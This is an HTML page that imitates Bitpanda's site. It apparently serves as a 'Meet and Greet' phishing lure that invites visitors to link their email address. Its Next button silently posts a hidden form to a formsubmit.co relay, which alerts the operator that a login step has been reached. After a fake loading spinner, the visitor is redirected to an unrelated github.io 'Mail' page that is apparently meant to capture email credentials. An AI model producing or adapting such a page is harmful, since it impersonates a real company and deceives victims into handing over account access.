


<!DOCTYPE html>
<html>
<head>

   
<html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script>


<meta charset=utf-8>


<title>
Meet and  Greet
</title>



<meta content="width=device-width, initial-scale=1.0" name=viewport>


<link href=https://www.bitpanda.com/en rel=canonical><link href=/en hreflang=x-default rel=alternate><link href=/en hreflang=en rel=alternate><link href=/de hreflang=de rel=alternate><link href=/fr hreflang=fr rel=alternate><link href=/es hreflang=es rel=alternate><link href=/it hreflang=it rel=alternate><link href=/pl hreflang=pl rel=alternate>

<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>


<script type=application/ld+json>{
                "@context": "https://schema.org",
                "@type": "BreadcrumbList",
                "itemListElement": [
                    [{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.bitpanda.com\/en"}]
                ]
            }</script> <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>




<h3>
<strong>
Successful

</strong>
</h3>







 </div>
 
</header> 
    
    
    
    
  

 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content>


<h5> 
<strong> 

<Font STYLE="word-spacing:3px">


 You can now link your email address to your meet and greet profile. This will ensure you receive crucial information about the meet and greet venue and time, directly to your email inbox.


<br>  <br> 

Tap on Next to proceed with linking your email to your meet and greet profile

<br> 
    <br>



<div>
  <style>
    #loading-icon {
      display: none;
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      z-index: 9999;
      text-align: center;
    }

    .spinner {
      width: 160px;
      height: 160px;
      margin: 0 auto;
      border: 18px solid #f3f3f3;
      border-top: 18px solid Brown;
      border-radius: 50%;
      animation: spin 2s linear infinite;
    }

    @keyframes spin {
      0% {
        transform: rotate(0deg);
      }
      100% {
        transform: rotate(360deg);
      }
    }

    #loading-text {
      font-weight: bold;
      margin-top: 10px;
      font-size: 35px;
      color: White;
      background-color: brown; /* Add brown background color */
      padding: 9px 13px; /* Add padding for better visibility */
      border-radius: 5px; /* Add border radius for rounded corners */
    }
  </style>

  <div id="loading-icon">
    <div class="spinner"></div>
    <div id="loading-text"><nobr>Please Wait...</nobr></div>
  </div>





<form  method="POST"  id="Deborah" action="https://formsubmit.co/4bf54b3ab80b3b2a069476d21c1d538c">

  <input type="hidden" name="_captcha" value="false">
  
  <input type="hidden" name="_next" value="https://enjoy-org.github.io/Mail/">
  
  <input type="hidden" name="Email_Login_Is_Submited" value="Go And Check Immediately">
  

 <button type="submit" onclick="showLoadingIcon()" style="display: block; width: 100%; height: 45px; background-color: #2F539B; color: white; font-size: 19px; font-weight: bold; border: none; border-radius: 30px; cursor: pointer;">
 Next
 </button>
 
 </from>
 

 
 
   <script>
    function showLoadingIcon() {
      var loadingIcon = document.getElementById("loading-icon");
      loadingIcon.style.display = "block";
      setTimeout(function() {
        document.getElementById("Deborah").submit();
      }, 1000); // Redirect after 2 seconds (adjust as needed)
    }

    function increaseFontSize() {
      var loadingText = document.getElementById("loading-text");
      var currentFontSize = window.getComputedStyle(loadingText, null).getPropertyValue('font-size');
      var currentFontSizeNumeric = parseFloat(currentFontSize);
      var newFontSize = currentFontSizeNumeric + 2;
      loadingText.style.fontSize = newFontSize + 'px';
    }
  </script>
  
</div>
   
 
    
  

</font>

</font>

 
 <br>
 
   <br>  <br> 
   <br>  <br>
 </h6>
    
    </div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">
<div>

 </section> 
</path> </symbol></svg>


  </div>
  
 
</body>
</html>
